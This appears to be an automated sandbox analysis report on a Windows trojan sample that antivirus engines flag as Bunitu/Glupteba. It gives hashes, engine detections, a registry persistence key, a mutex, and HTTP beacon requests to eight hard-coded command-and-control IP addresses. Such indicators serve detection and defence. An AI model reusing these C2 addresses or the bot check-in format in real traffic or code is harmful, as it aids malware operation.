Analysis Date2015-08-05 14:32:40
MD5265731579422ab7004915d7559647ca7
SHA1fcca2c1cb7bade619c7f1dd95872223abdf31be9

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
PEhash5670c3168dcaa69693f08a2db817f956af668fbb
IMPhash943b709cb2ec662ae54a42eda7be5403
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Zusy.152774
AVDr. WebBackDoor.Siggen.59488
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Zusy.152774
AVBullGuardGen:Variant.Zusy.152774
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)no_virus
AVTrend Microno_virus
AVKasperskyno_virus
AVZillya!no_virus
AVEmsisoftGen:Variant.Zusy.152774
AVIkarusTrojan.Win32.Injector
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Trojan.NAMU-3646
AVMalwareBytesTrojan.Bunitu
AVMicroWorld (escan)Error Scanning File
AVMicrosoft Security EssentialsTrojan:Win32/Carberp!rfn
AVK7Trojan ( 004c97431 )
AVBitDefenderGen:Variant.Zusy.152774
AVFortinetW32/Glupteba.MRX!tr
AVSymantecno_virus
AVGrisoft (avg)Inject2.COIK
AVEset (nod32)Win32/Injector.CGDL
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVAd-AwareGen:Variant.Zusy.152774
AVTwisterTrojan.DOMG.vxor
AVAvira (antivir)TR/AD.Glupteba.Y.286
AVMcafeeno_virus
AVRisingno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝
21150720\\x00
Creates File\Device\Afd\Endpoint
Creates MutexGlobal\MD7H82HHF7EH2D73

Network Details:

HTTP GEThttp://85.195.119.178:19069/stat?uid=100&downlink=1111&uplink=1111&id=00062230&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
User-Agent:
HTTP GEThttp://5.79.80.162:14066/stat?uid=100&downlink=1111&uplink=1111&id=000636B2&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
User-Agent:
HTTP GEThttp://212.175.87.184:49205/stat?uid=100&downlink=1111&uplink=1111&id=00064A79&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
User-Agent:
HTTP GEThttp://209.17.119.203:34373/stat?uid=100&downlink=1111&uplink=1111&id=00065E10&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
User-Agent:
HTTP GEThttp://178.33.248.60:46612/stat?uid=100&downlink=1111&uplink=1111&id=000671A8&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
User-Agent:
HTTP GEThttp://62.212.154.220:53818/stat?uid=100&downlink=1111&uplink=1111&id=00068540&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
User-Agent:
HTTP GEThttp://115.112.200.88:21160/stat?uid=100&downlink=1111&uplink=1111&id=000698D7&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
User-Agent:
HTTP GEThttp://54.238.54.133:31189/stat?uid=100&downlink=1111&uplink=1111&id=0006AC7F&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 85.195.119.178:19069
Flows TCP192.168.1.1:1031 ➝ 85.195.119.178:19069
Flows TCP192.168.1.1:1032 ➝ 5.79.80.162:14066
Flows TCP192.168.1.1:1033 ➝ 212.175.87.184:49205
Flows TCP192.168.1.1:1034 ➝ 209.17.119.203:34373
Flows TCP192.168.1.1:1035 ➝ 178.33.248.60:46612
Flows TCP192.168.1.1:1036 ➝ 62.212.154.220:53818
Flows TCP192.168.1.1:1037 ➝ 115.112.200.88:21160
Flows TCP192.168.1.1:1038 ➝ 54.238.54.133:31189

Raw Pcap

Strings